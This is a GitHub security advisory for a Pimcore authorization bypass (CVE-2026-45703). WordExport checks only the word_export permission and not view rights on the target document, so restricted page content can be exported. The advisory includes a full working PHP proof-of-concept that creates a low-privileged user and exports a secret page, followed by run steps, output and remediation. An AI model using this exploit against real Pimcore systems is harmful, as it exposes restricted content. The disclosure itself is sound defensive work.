Skip to content

Pimcore has a WordExport Authorization Bypass for Unauthorized Document Export

Moderate severity GitHub Reviewed Published May 26, 2026 in pimcore/pimcore • Updated May 27, 2026

Package

composer pimcore/pimcore (Composer)

Affected versions

<= 12.3.6

Patched versions

12.3.7

Description

Summary

The WordExport export flow only checks whether the current backend user has the feature permission word_export. It does not verify access rights on the target element itself.
As a result, a low-privileged backend user can export document content even when the user does not have view permission on that document.

In the local Docker reproduction, a low-privileged user successfully exported sensitive content from a page the user was not allowed to view:

  • POC-WORDEXPORT-TITLE
  • POC-WORDEXPORT-DESC

Root Cause

The controller only performs a feature-level permission check before starting the export flow:

It then directly resolves the target element from attacker-controlled type/id input:

For document-like elements such as Page and Snippet, it renders content in an admin context:

No object-level authorization check such as isAllowed('view') is enforced on the target element.

Affected Scope

Based on the source code, the following element types may be affected:

  • page
  • snippet
  • email
  • object

For page-like documents, the pimcore_admin = true rendering context may expose additional backend-visible content.

Preconditions

  • The attacker is an authenticated backend user
  • The attacker has the word_export permission
  • The attacker does not have view permission on the target document

Reproduction Environment

  • Reproduction root: pimcore-12.3.3-repro
  • Standalone PoC script: [poc_wordexport.php](pimcore-12.3.3-repro/tools/poc_wordexport.php)
<?php
declare(strict_types=1);

use Pimcore\Bundle\WordExportBundle\Controller\TranslationController as WordExportController;
use Pimcore\Controller\UserAwareController;
use Pimcore\Model\Document\Page;
use Pimcore\Model\User;
use Pimcore\Security\User\TokenStorageUserResolver;
use Pimcore\Security\User\User as SecurityUser;
use Pimcore\Serializer\Serializer as PimcoreSerializer;
use Pimcore\Tool\Authentication;
use Symfony\Component\DependencyInjection\ContainerInterface;
use Symfony\Component\Filesystem\Filesystem;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\RequestStack;
use Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken;
use Symfony\Component\Security\Core\Authentication\Token\Storage\TokenStorage;

require dirname(__DIR__) . '/vendor/autoload.php';

define('PIMCORE_PROJECT_ROOT', dirname(__DIR__));

try {
    \Pimcore\Bootstrap::bootstrap();

    $kernel = new \App\Kernel('dev', true);
    \Pimcore::setKernel($kernel);
    $kernel->boot();

    $container = $kernel->getContainer();

    /** @var RequestStack $requestStack */
    $requestStack = getService($container, [
        RequestStack::class,
        'request_stack',
    ]);

    $admin = User::getByName('admin');
    if (!$admin instanceof User) {
        fail('admin user is missing');
    }

    $auditor = User::getByName('auditor_wordexport');
    if (!$auditor instanceof User) {
        $auditor = new User();
        $auditor->setParentId(0);
        $auditor->setName('auditor_wordexport');
    }

    $auditor->setAdmin(false);
    $auditor->setActive(true);
    $auditor->setPassword(Authentication::getPasswordHash('auditor_wordexport', 'auditor-pass'));
    $auditor->setPermissions(['word_export']);
    $auditor->setRoles([]);
    $auditor->setWorkspacesDocument([]);
    $auditor->setWorkspacesAsset([]);
    $auditor->setWorkspacesObject([]);
    $auditor->save();

    $page = Page::getByPath('/poc-wordexport-secret-page');
    if (!$page instanceof Page) {
        $page = new Page();
        $page->setParentId(1);
        $page->setKey('poc-wordexport-secret-page');
    }

    $page->setPublished(true);
    $page->setController('App\\Controller\\DefaultController::defaultAction');
    $page->setTemplate('default/default.html.twig');
    $page->setTitle('POC-WORDEXPORT-TITLE');
    $page->setDescription('POC-WORDEXPORT-DESC');
    $page->setProperty('language', 'text', 'en', false, true);
    $page->setUserOwner($admin->getId());
    $page->setUserModification($admin->getId());
    $page->save();

    $canViewPage = $page->getDao()->isAllowed('view', $auditor);

    $tokenResolver = buildTokenResolver($auditor);
    $controller = wireController(new WordExportController(), $container, $tokenResolver);

    $exportId = 'wordexportpoc1';
    $exportRequest = new Request([], [
        'id' => $exportId,
        'data' => json_encode([
            ['type' => 'document', 'id' => $page->getId()],
        ], JSON_THROW_ON_ERROR),
        'source' => 'en',
    ]);

    $requestStack->push($exportRequest);
    $controller->wordExportAction($exportRequest, new Filesystem());
    $requestStack->pop();

    $downloadRequest = new Request(['id' => $exportId]);
    $requestStack->push($downloadRequest);
    $downloadResponse = $controller->wordExportDownloadAction($downloadRequest);
    $requestStack->pop();

    $wordContent = (string) $downloadResponse->getContent();

    echo json_encode([
        'vulnerability' => 'wordexport_authorization_bypass',
        'user' => [
            'id' => $auditor->getId(),
            'name' => $auditor->getName(),
            'permissions' => $auditor->getPermissions(),
        ],
        'target_page' => [
            'id' => $page->getId(),
            'path' => $page->getFullPath(),
            'title' => $page->getTitle(),
            'description' => $page->getDescription(),
            'user_can_view_page' => $canViewPage,
        ],
        'result' => [
            'download_contains_title' => str_contains($wordContent, 'POC-WORDEXPORT-TITLE'),
            'download_contains_description' => str_contains($wordContent, 'POC-WORDEXPORT-DESC'),
        ],
    ], JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES), PHP_EOL;
} catch (Throwable $e) {
    fail(sprintf(
        '%s: %s in %s:%d%s',
        $e::class,
        $e->getMessage(),
        $e->getFile(),
        $e->getLine(),
        $e->getTraceAsString() ? PHP_EOL . $e->getTraceAsString() : ''
    ));
}

function wireController(
    UserAwareController $controller,
    ContainerInterface $container,
    TokenStorageUserResolver $tokenResolver
): UserAwareController
{
    $controller->setContainer($container);
    $controller->setTokenResolver($tokenResolver);

    if (method_exists($controller, 'setPimcoreSerializer')) {
        /** @var PimcoreSerializer $serializer */
        $serializer = getService($container, [
            PimcoreSerializer::class,
            'Pimcore\\Serializer\\Serializer',
        ]);
        $controller->setPimcoreSerializer($serializer);
    }

    return $controller;
}

function buildTokenResolver(User $user): TokenStorageUserResolver
{
    $tokenStorage = new TokenStorage();
    $proxyUser = new SecurityUser($user);
    $token = new UsernamePasswordToken($proxyUser, 'pimcore_admin', $proxyUser->getRoles());
    $tokenStorage->setToken($token);

    return new TokenStorageUserResolver($tokenStorage);
}

function getService(ContainerInterface $container, array $ids): mixed
{
    foreach ($ids as $id) {
        try {
            if ($container->has($id)) {
                return $container->get($id);
            }
        } catch (Throwable) {
        }
    }

    fail('Unable to resolve service: ' . implode(', ', $ids));
}

function fail(string $message): never
{
    fwrite(STDERR, $message . PHP_EOL);
    exit(1);
}

Reproduction Steps

  1. Create a low-privileged user named auditor_wordexport with only the word_export permission and no document workspace permissions.
  2. Create a test page at /poc-wordexport-secret-page containing sensitive values:
    • title = POC-WORDEXPORT-TITLE
    • description = POC-WORDEXPORT-DESC
  3. Verify that the user does not have view permission on that page.
  4. Execute wordExportAction() and wordExportDownloadAction() as that user.
  5. Check whether the exported HTML contains the sensitive values.

Reproduction command:

cd pimcore-12.3.3-repro
docker compose exec -T php php tools/poc_wordexport.php

Reproduction Result

Relevant PoC output:

{
  "vulnerability": "wordexport_authorization_bypass",
  "user": {
    "name": "auditor_wordexport",
    "permissions": [
      "word_export"
    ]
  },
  "target_page": {
    "path": "/poc-wordexport-secret-page",
    "title": "POC-WORDEXPORT-TITLE",
    "description": "POC-WORDEXPORT-DESC",
    "user_can_view_page": false
  },
  "result": {
    "download_contains_title": true,
    "download_contains_description": true
  }
}

This shows that:

  • The user cannot view the target page
  • The exported file still contains the page's sensitive content

This confirms that the issue is practically exploitable.

Security Impact

  • Unauthorized disclosure of structured page fields
  • Unauthorized export of restricted backend content
  • Potential exposure of unpublished or otherwise restricted content
  • Lateral data access by low-privileged backend accounts

Remediation

  1. Perform object-level authorization immediately after resolving the element from type/id.
  2. Require at least view permission on the target element.
  3. Apply consistent authorization checks across page, snippet, email, and object.
  4. Bind export creation and export download to the requesting user or an equivalent authorization context.
  5. Add regression tests to ensure that users with word_export but without element view permission cannot export content.

References

@kingjia90 kingjia90 published to pimcore/pimcore May 26, 2026
Published to the GitHub Advisory Database May 27, 2026
Reviewed May 27, 2026
Last updated May 27, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
Low
Integrity
None
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L

EPSS score

Weaknesses

Incorrect Authorization

The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. Learn more on MITRE.

CVE ID

CVE-2026-45703

GHSA ID

GHSA-332x-r494-54fq

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.